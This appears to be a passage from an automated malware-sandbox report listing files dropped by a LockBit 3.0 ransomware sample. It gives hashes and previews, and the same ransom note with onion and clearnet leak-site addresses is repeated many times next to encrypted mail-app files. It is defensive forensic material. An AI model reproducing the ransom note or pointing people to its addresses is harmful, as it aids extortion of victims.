                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\2\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):65793
                Entropy (8bit):7.997509072418033
                Encrypted:true
                SSDEEP:1536:i23pjkSwh7IzPICgkd2vbZTQURs+r39xDF7:N3pbk7KdYOED7
                MD5:B290008CBE25F76461FDE7179DD4B43D
                SHA1:947DBD0C73C488E726AFCDC15067303CAE7F2ED7
                SHA-256:9130027817D578FE3CF291B636435250C6720984472D7FFB139AB1AA927523B1
                SHA-512:1661AB620E164420D3354602BDB82A50D533525372CC780209F940DF1FC9A6280D38696A2C1AF3918A9A7F6E2B15C9783A03280F9171DC9A8DB819E0AA4ED50B
                Malicious:true
                Preview:....,..K..2..m3d..!..(0.5d.Q..`?)..W0.u?.n..&..j.'...wm..o.......Mx...@.\....<..)..s.z.6...s....Q.......I..`x..s..s...33....1..w.F..A.*..;.Z.....`..9....;c.u....b.].ix.... ...J.r....(..# L.|.)....D.i.}q..s.U...kn.....v^;H..V..)G3..F`.....f..Xh.{.VMK.]c.+.......s...hjB.e...C_.g;....<.[I9..iw.....F....u..H.r.......>...O.....B.7.....f....ef{.t.=}.D.......4..~m..mN).2......r.....w.1.k.m.25...`.W27..3ov....S.r...AZG...[KI.s...s..1..3....CaRV_&.n..14...J..'}..v..\.Y....."..n..ec...Y.R ~`P.....!p8/=....(.k..yO..A.bu..]....v....e.}.k..@.?.id...8k..!.%.....0....._.'..$n~..I..M3.J`N..2........!.9......Va...(N.........s.-......]tc:s.s...).+..x.&)...^.mp R.\.F.......U...t...<2.*..P..7.K....O..G.H...y.{1`..A.....5....-...[..S@p%.:"S..Q..YM.....M......UCs.'.D\+e. #.....P...W.....<.@m..cE._....`.G.....ag.g......kE...5(..?.P.W".].<.Y..cAFX.].1...O.......O.H..q1..&I.ko.....=.....Ed.V.tCX..2.....:.HXe.%..'.M#.8.....e.8...%....mn.%.w..W..N.12....\+.... y`

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):65798
                Entropy (8bit):7.997059794703143
                Encrypted:true
                SSDEEP:1536:dT6kBkbPB9bgB2U1T2YVrBQlivGB1SchiMfsD7e/9:dT6fBxsNBQlcGBUaA7Y9
                MD5:D4D67B9F967B2A4E1129D96626F618FB
                SHA1:0E08C15F71730E30FC600E229BA540AFDA41518C
                SHA-256:468EF288DE3E1287E586814CC3DC11D858B43C8FBEF4EF0462FEB19F083515C9
                SHA-512:A2A78BB350B15C1568EBEACAC85DDBA163183C120DC9B99F2FAFC33FA837B746200F573A08CF499B2D81305C01A7B67B0C443761E9BB4421C53282AE2CCB3CDE
                Malicious:true
                Preview:...xI....|.d...\V....u(..B..a..._H@.Q[..Q%.O..M.....M..........`.uc.w........O.\..}..3K..:.......L3l.B......>.j..F....a.my...~.......r^.E...E`...../6/r....c.uK..b.\.=.z.{D+AmBn......66p.v.@...u....l...9..2..:dg5."OK..mf........v......s.o..K..8YJ.........t..6.}...r.f.8.N.0..6.(...\.&pj...ko1T...4.R..{.).2k...7...R...9t^.\..t.i.;.o..H.tt.......?.b&.....&......,.p.."x.b..sU.rr.|..aB.-..8....z/..8.SdI..m2.i2...;...?IS}.(.J#]..\....x..L...-...67......_B_..&..a..c..z..c.?....X.2....n.E....>%....R1%..DS&.&.<...Y..aB... `.`.q......o..7vtc.%.;.1.:[%..n.>E....a.....SL...e...I6?ze...~.....D_9....DV.l..~..X.@y....p.y}..c.Z.Z..0...C..c.N.X$*!v........tGU.O...U..|....c.....!.\d...xf...q......u.8X.p.....i.._.e.8..g.&....[v[.Y+.V......7.....S...R.'[.C.{..R(......m..xr..Q..8~.....J.[a..;7gx=..R..A.W.....u.A._rT...A.GM.=V..BiG$..?.o.+....VO.y...H..]...;\..j..v'...ad......>.1.f...<.@..x...o!...WxM...+~q...........^=...#.,..i&..\....S.....Vq....2..q;..u.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4194544
                Entropy (8bit):1.811817704333948
                Encrypted:false
                SSDEEP:12288:pq4GdcXZ4bNm+PKLGU6jSGU8Nv/DVcpA6tY/1Spy0P:BZZp+iLjCa8NH4VtYoZ
                MD5:F9E602475F760FF43D14D4357C77EBD5
                SHA1:11007EBF967C8816AB35C484436023EA57C3EB24
                SHA-256:CCCA349282E4C40B2FD0048D3AD6F3900FA35641CA4DBA390F33156826899D9D
                SHA-512:88EF1AAD6229EF1E12D87642CD2B9A73C4320E86528B94EF4B0E5CF328F78F809239E721380C040ED1B93D6AE31E8F4651AED04AFD5EF40AF9AC1EECA957BCDF
                Malicious:false
                Preview:C{.w.R...>....g.....EA..)%..q$..-.0....M)...."...)...55*z...5..oL..Wx~.p..u.B0.+..^.P...c.b.s....T.........i.y.,_...L.d.My.+.....k.aV..%.W..dW...s..6\F3..[C-...t.{g.43A....Ea..........Qz..?4\.~c..C.`#..?..^..|.^r}&..... ..Kc.d.................m.....y.-.y......+..o7.H.9..dx..c.G!.n.G[...X...u..Ab.k>Z.5..\......_?..{....#...S..*..I...:?.>.Q..8*.Hjj.t..Z-........Muk9.PPAk..tll.:.N....4u.|...E.....LI......`.%..]........r.AN.Z.cu......:c...NstS....)>R.0P+.6k.}.dso..........M&..gGn...x.vqy..Q$.......*4i.UC..v..2.bi....L....s.0.- @..r...&.Q..O.{$......7.....I.[.)....E2CFK..{k.....Z. ....T.q....%..-.p......n1N4I.=.*...>..)T.Z......{7.Yi".3.y.M.j..#,.z...({.8..rtK.....z.T.....z..e.E.v_..bN...%M.D..Q.:.W.....o..nC...^...E........pA.H....,....9/f[,(..!_...*O4!)%N}!.A...`.i.^.'.]D.@{.9T..Q..;..89.gL.............v:D..$......8t,...r.PcA`I.."J4.rp"..*D6.*.TeOQ....8..kt9.9..O....r..ml....D..T/....a...A..JG..M.a...j.f...$...0.....[.. .z.,.._........

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\1230\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
